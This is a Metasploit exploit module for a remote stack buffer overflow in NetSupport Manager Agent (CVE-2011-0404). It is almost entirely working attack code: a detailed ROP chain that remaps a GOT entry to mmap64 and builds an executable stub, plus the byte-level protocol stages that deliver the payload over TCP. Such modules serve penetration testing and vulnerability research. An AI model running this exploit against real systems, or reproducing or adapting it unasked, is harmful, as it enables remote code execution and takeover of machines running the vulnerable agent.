##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
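class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Metadata for the NetSupport Manager Agent stack overflow (CVE-2011-0404).
  #
  # The only target is a single non-PIE Linux build of the agent: every
  # gadget, PLT stub and GOT slot below is an absolute address in that
  # binary, so the module cannot work against other builds without a new
  # target entry.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NetSupport Manager Agent Remote Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in NetSupport Manager
          Agent. The stack is not executable, so it uses a ROP chain in the
          style of the proftpd_iac exploit: the GOT entry of localtime is
          rebased onto mmap64 (mmap is not imported by the binary), an
          executable region is mapped, a small copy stub is written into it
          through getrlimit's GOT slot, and the stub copies the payload off
          the stack into that region and runs it.
        },
        'Author' => [
          'Luca Carettoni (@_ikki)', # original discovery / exploit
          'Evan', # ported from exploit-db exploit
          'jduck' # original proftpd_iac ROP, minor cleanups
        ],
        'Arch' => ARCH_X86,
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2011-0404' ],
          [ 'OSVDB', '70408' ],
          [ 'BID', '45728' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2011/Jan/90' ],
          [ 'EDB', '15937' ]
        ],
        'Privileged' => true,
        'Platform' => 'linux',
        'Payload' => {
          # Space must not exceed the target's 'Pad': the frame between the
          # leading nop and the saved return address is exactly Pad bytes and
          # the \xcc filler is sized as Pad - payload length. The previous
          # value of 0x975 (2421) advertised ~2.5x the real capacity and made
          # that filler count negative for larger payloads (ArgumentError).
          #
          # NOTE(review): the copy stub written below moves 0x7f dwords
          # (508 bytes) into the mapped region, so payloads longer than that
          # appear to be truncated at runtime even though they fit the frame;
          # confirm against the binary before relying on the full 975 bytes.
          'Space' => 975,
          'BadChars' => "",
          'DisableNops' => true,
        },
        'Targets' => [
          [
            'linux',
            {
              # First gadget reached by the overwritten return address; it
              # consumes the first three ROP entries (eax, ebx, ebp).
              'Ret' => 0x0805e50c, # pop eax ; pop ebx ; pop ebp ;;
              # Bytes between the leading nop and the saved return address.
              'Pad' => 975,
              # Entries equal to 0xcccccccc are never consumed and are
              # replaced with random dwords when the chain is built.
              'RopStack' =>
              [
                ### mmap isn't used in the binary so we need to resolve it in libc:
                ### add (mmap64 - localtime) to localtime's GOT slot.
                0x00041160, # eax: mmap64 - localtime
                0xa9ae0e6c, # ebx: 0x8092b30 - 0x5e5b1cc4, localtime's GOT slot minus the gadget displacement
                0xcccccccc, # ebp: unused
                0x08084662, # add DWORD PTR [ebx+0x5e5b1cc4],eax; pop edi; pop ebp ;;
                0xcccccccc, # edi: unused
                0xcccccccc, # ebp: unused
                0x080541e4, # localtime@plt (now mmap64)
                0x080617e3, # return address for mmap64: add esp 0x10 ; pop ebx ; pop esi ; pop ebp ;;
                0, 0x20000, 0x7, 0x22, 0xffffffff, 0, # mmap64(NULL, 0x20000, RWX, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
                0x0, # unused
                # eax now holds the base of the new region. Plant a one-dword
                # store primitive there: edx <- "mov [eax+ebp*4], ebx ; ret",
                # then write edx to [eax].
                0x08066332, # pop edx; pop ebx; pop ebp ;;
                "\x89\x1c\xa8\xc3".unpack('V').first, # edx: raw bytes of mov [eax+ebp*4], ebx ; ret
                0xcccccccc, # ebx: unused
                0xcccccccc, # ebp: unused
                0x080555c4, # mov [eax] edx ; pop ebp ;;
                0xcccccccc, # ebp: unused
                # 0x0807385a, # push eax ; adc al 0x5d ;;

                ### this is the stub used to copy shellcode from the stack to
                ### the newly mapped executable region
                # \x8D\xB4\x24\x7D\xFB\xFF # lea esi,[dword esp-0x483]
                # \x8D\x78\x12 # lea edi,[eax+0x12]
                # \x6A\x7F # push byte +0x7f
                # \x59 # pop ecx
                # \xF3\xA5 # rep movsd

                ### there are no good jmp eax so overwrite getrlimits GOT entry
                ### with eax; every getrlimit@plt call below then runs whatever
                ### sits at the start of the mapped region.
                0x0805591b, # pop ebx; pop ebp ;;
                0x08092d68 - 0x4, # 08092d68 0002f007 R_386_JUMP_SLOT 00000000 getrlimit
                0x1, # becomes ebp (store index for the first stub dword)
                0x08084f38, # mov [ebx+0x4] eax ; pop ebx ; pop ebp ;;
                # Each getrlimit@plt call executes the store primitive and
                # writes ebx to [eax + ebp*4]; the five calls lay down the
                # 20-byte stub above, dword by dword.
                0xfb7c24b4, # becomes ebx: stub bytes 4..7
                0x01,
                0x08054ac4, # <getrlimit@plt>
                0x0805591b, # pop ebx; pop ebp ;;
                # 0xffff8d78, # become ebx
                0x788dffff, # becomes ebx: stub bytes 8..11
                0x2,
                0x08054ac4, # <getrlimit@plt>
                0x0805591b, # pop ebx; pop ebp ;;
                0x597f6a12, # becomes ebx: stub bytes 12..15
                0x3,
                0x08054ac4, # <getrlimit@plt>
                0x0805591b, # pop ebx; pop ebp ;;
                0x9090a5f2, # becomes ebx: stub bytes 16..19
                0x4,
                0x08054ac4, # <getrlimit@plt>
                0x0805591b, # pop ebx; pop ebp ;;
                0x8d909090, # becomes ebx: stub bytes 0..3, overwriting the store primitive itself
                0x0,
                0x08054ac4, # <getrlimit@plt> -- now runs the completed stub, which copies and executes the payload
                0xcccccccc,
                0x01010101,
              ]
            }
          ]
        ],
        'DisclosureDate' => '2011-01-08',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(5405),
      ]
    )
  end

  # Builds the four protocol stages and sends them one second apart.
  #
  # Stage C carries the overflow: a leading nop, the encoded payload, int3
  # filler up to the saved return address, the first gadget address and the
  # ROP chain from the target definition. Stages A, B and D are the fixed
  # protocol framing taken from the original exploit.
  #
  # Fails with Failure::BadConfig before connecting if the payload does not
  # fit the target's frame; the socket is always closed on exit.
  def exploit
    shellcode = payload.encoded
    pad_len = target['Pad'] - shellcode.length
    # Guard against a payload larger than the frame: String#* would raise on
    # the negative count and the return address would land in the wrong slot.
    if pad_len < 0
      fail_with(Failure::BadConfig,
                "Payload is #{shellcode.length} bytes but the target frame only holds #{target['Pad']}")
    end

    # Fixed framing: 4-byte header, 1024 'A's, 13 NUL bytes.
    stage_a = "\x15\x00\x5a\x00" + ("\x41" * 1024) + ("\x00" * 13)

    stage_b = "\x25\x00\x51\x00\x81\x41\x41\x41\x41\x41\x41\x00" +
              "\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
              "\x00\x00\x00"

    # Header bytes embed the ASCII strings "ikki", "WORKGROUP" and "<>".
    stage_c = "\x37\x00\x03\x00\x0a\x00\x00\x00\x00\x00\x58\xb4" +
              "\x92\xff\x00\x00\x69\x6b\x6b\x69\x00\x57\x4f\x52" +
              "\x4b\x47\x52\x4f\x55\x50\x00\x3c\x3e"
    # "\xcc" +
    stage_c << "\x90"                   # single nop ahead of the payload
    stage_c << shellcode
    stage_c << "\xcc" * pad_len         # int3 filler up to the saved return address
    stage_c << [target.ret].pack('V')   # pop eax ; pop ebx ; pop ebp ; ret
    stage_c << build_rop_chain
    stage_c << "\x00" * 4
    # Trailer bytes decode to "\0\x0012.62.1.42" and "0\x0010\0\0"; kept
    # verbatim from the original exploit.
    stage_c << "\x00\x00\x31\x32\x2e\x36\x32\x2e\x31\x2e\x34\x32"
    stage_c << "\x30\x00\x31\x30\x00\x00"

    stage_d = "\x06\x00\x07\x00\x20\x00\x00\x00\x0e\x00\x32\x00" +
              "\x01\x10\x18\x00\x00\x01\x9f\x0d\x00\x00\xe0\x07" +
              "\x06\x00\x07\x00\x00\x00\x00\x00\x02\x00\x4e\x00" +
              "\x02\x00\xac\x00\x04\x00\x7f\x00\x00\x00"

    connect
    begin
      send_stage('A', stage_a)
      send_stage('B', stage_b)
      send_stage('C', stage_c)
      send_stage('D', stage_d)
    ensure
      disconnect
    end
  end

  private

  # Packs the target's RopStack as little-endian dwords, replacing each
  # 0xcccccccc placeholder (a slot no gadget consumes) with a random dword.
  # Returns an empty string when the target defines no RopStack.
  def build_rop_chain
    Array(target['RopStack']).map do |dword|
      dword == 0xcccccccc ? rand_text(4).unpack('V').first : dword
    end.pack('V*')
  end

  # Writes one stage to the socket and waits a second so the agent has
  # processed it before the next stage arrives.
  def send_stage(label, data)
    print_status("Sending #{label}")
    sock.put(data)
    select(nil, nil, nil, 1)
  end
end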